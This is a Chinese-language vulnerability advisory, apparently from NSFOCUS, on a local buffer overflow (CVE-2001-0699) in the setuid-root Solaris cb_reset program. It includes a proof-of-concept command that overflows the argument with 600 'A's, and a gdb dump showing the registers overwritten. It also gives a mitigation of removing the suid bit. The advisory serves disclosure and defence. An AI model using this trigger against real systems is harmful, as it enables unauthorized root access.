首页 -> 安全研究
安全研究
安全漏洞
Solaris cb_reset 本地缓冲区溢出漏洞
发布日期:2001-06-20
更新日期:2001-07-03
受影响系统:
描述:
Sun Solaris 8.0
BUGTRAQ ID: 2893
CVE(CAN) ID: CVE-2001-0699
SUNWssp软件包中所带的cb_reset程序中存在一个本地缓冲区溢出漏洞。
当在命令行中传递一个超过600字符长的参数给cb_reset时,将发生缓冲区溢出。由于此
程序被设置了setuid root属性,本地攻击者可以获取root权限。
<*来源:Pablo Sor (psor@afip.gov.ar) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Pablo Sor (psor@afip.gov.ar)提供了如下测试步骤:
$ uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10
$ ls /tftpboot/cb_port
/tftpboot/cb_port
$ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
Resetting host
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ether_hostton(SrcHost:laika): No such file or directory
ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA): No such file or directory
Bus Error (core dumped)
$ gdb /opt/SUNWssp/bin/cb_reset --core=core
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)...
Core was generated by `/opt/SUNWssp/bin/cb_reset
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 10, Bus Error.
Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
(no debugging symbols found)...done.
Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
Reading symbols from /opt/SUNWssp/lib/liblogger.so...
(no debugging symbols found)...done.
[...]
Loaded symbols for /usr/lib/nss_files.so.1
#0 0x1219c in cb_send_frame ()
(gdb) info registers
g0 0x0 0
g1 0xff195b80 -15115392
g2 0xff322630 -13490640
g3 0xff332d78 -13423240
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x13278 78456
o1 0xff1bbab8 -14959944
o2 0xff1b8018 -14974952
o3 0x13278 78456
o4 0x13258 78424
o5 0xffbedb71 -4269199
sp 0xffbedb18 -4269288
o7 0x1218c 74124
l0 0xc3c3c3c3 -1010580541
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x4141414d 1094795597
i5 0x41414141 1094795585
fp 0x41414141 1094795585
i7 0x41414141 1094795585 (***)
y 0xb 11
psr 0xfe801001 -25161727
wim 0x0 0
tbr 0x0 0
pc 0x1219c 74140
npc 0x121a0 74144
fpsr 0x0 0
cpsr 0x0 0
(gdb)
建议:
临时解决方法:
去掉cb_reset的suid属性:
# chmod a-s /opt/SUNWssp/bin/cb_reset
厂商补丁:
暂无
浏览次数:4017
严重程度:0(网友投票)
绿盟科技给您安全的保障